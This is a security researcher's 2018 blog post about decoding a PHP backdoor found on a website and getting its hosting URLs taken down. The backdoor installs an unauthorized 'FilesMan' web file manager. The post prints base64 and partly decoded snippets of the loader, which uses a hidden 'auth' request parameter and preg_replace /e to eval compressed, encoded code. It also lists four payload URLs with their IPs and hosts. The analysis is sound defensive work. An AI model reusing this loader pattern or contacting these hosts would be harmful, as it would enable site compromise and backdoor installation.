File Manager URLs Takedown

11-02-2018


This research was completed in conjunction with another web security professional, Devin LaMarca. He discovered and decoded the malicious files. You can find him at his website here: devinlamarca.com

Devin found this file on a site while looking for malicious activity, he was able to decode the file and discovered the script is used to install a malicous and unauthorized File Managers onto sites. Once the file manager is installed, it can be used to upload additional files or used to search and download current site files.

In the malicious script, Devin located a list of URLs used to call the File Manager code. We took that list and verified the malicous code on each, then used that data to initiate takedowns with the host.

From the 4 URLs discovered, one had already been taken down due to the violation, and one is hosted with CloudFlare. Unfortunately getting sites taken down from CloudFlare is an exercise in futility.

the Last 2 URLs were still up and hosted on BlueHost and OVH, both companies have a great abuse departments and I was able to record the violations and send them to their respective abuse teams. This log will be updated once I receive updates from BlueHost and OVH.

Unfortunatly We weren't able to get any relevant crawl data from the host. It seems each server may only have one or two.

Original Code (Snippet Only)
JGRvID0gJ2h0dWEnOyBpZiAoaXNzZXQoJF9SRVFVRVNUW3N0cnJldigkZG8pXSkpIHsNCiRjb2xvciA9ICIjZGY1IjsNCiRkZWZhdWx0X2FjdGlvbiA9ICdGaWxlc0
YWpheCA9IHRydWU7DQokZGVmYXVsdF9jaGFyc2V0ID0gJ1dpbmRvd3MtMTI1MSc7DQpwcmVnX3JlcGxhY2UoIi8uKi9lIiwiXHg2NVx4NzZceDYxXHg2Q1x4MjhceD
NkNceDYxXHg3NFx4NjVceDI4XHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NVx4MjgnN1gxcmU5czJ6L0RuOVZjd21qZl
cGN1Z3A2ZVBKc214cmtTMVBrdU5rV2Y3N0M0Q2tSRXF5NDNTNzM4TjF2YnVmcDdGSUVBUkprQVJCQUhUN3hSVm5OSWx1aTRYTzZkN0p4NzJUQy9QTjJkbUh6amw4ZG
YllIempnS1dZdFpRV0RkRm8zWHZqL3dIS1BNakZOdkdrend4L3ZUbzFkK2hMOWNxMk1GOXRDOWRnTDgvR0tOZTg0Ti9qcXhSbDBQRWt0TjV2YUxrOEFaZEVaV1pBK0
eVdtMEo4c3cxRnhNZm9IWG9XRDBuS0ZMdVdxMVNaYytxejlpUkg3RjlmenJ1bVZDdmMrTkdUWFlQLzl0eXgyNG5kS0tpNlFTQkgzUThmMkNXajg0UER3RXF5WVBVRH
UFhIbmNnZE9RSUNjdW16NDdrak55ckdhU05yNE5xZFA2ZCs1SVNkWURwR0dKN2JjL3J1R05yOTZmUzRBNjA3UFRnK2dzYWE5Y3B6azNmVklGMThNTEdMMU9MK2RHd2
UVNDRkk0RVRUWU16Y3NNTUhUK1pzOHNFRXhCT3FXaTJPZlMzQUdpd1BML1pob2ZQaCtQUU1tQ0pUTjJVQVRLR3pjM3o4N21BdkY0Wm5FYWE0RmJQUVAvUUg3cmlJaF
Decoded File
$do = 'htua'; if (isset($_REQUEST[strrev($do)])) {
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F
\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6
d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8A
ZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzrumVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZ
URL Data
http://netnet44.net/s
netnet44.net
192.99.37.147
ovh.ca

http://simbersa.com/s.txt
Simbersa.com
162.241.218.100
Box5554.bluehost.com

http://micwar.com/content.txt
micwar.com
74.220.199.6
Parking.bluehost.com


http://odintara.com/s
Odintara.com
104.31.93.17
cloudflare.com
Screen Shots






© 2019 Dixon Ryder All Rights Reserved.
Privacy & Terms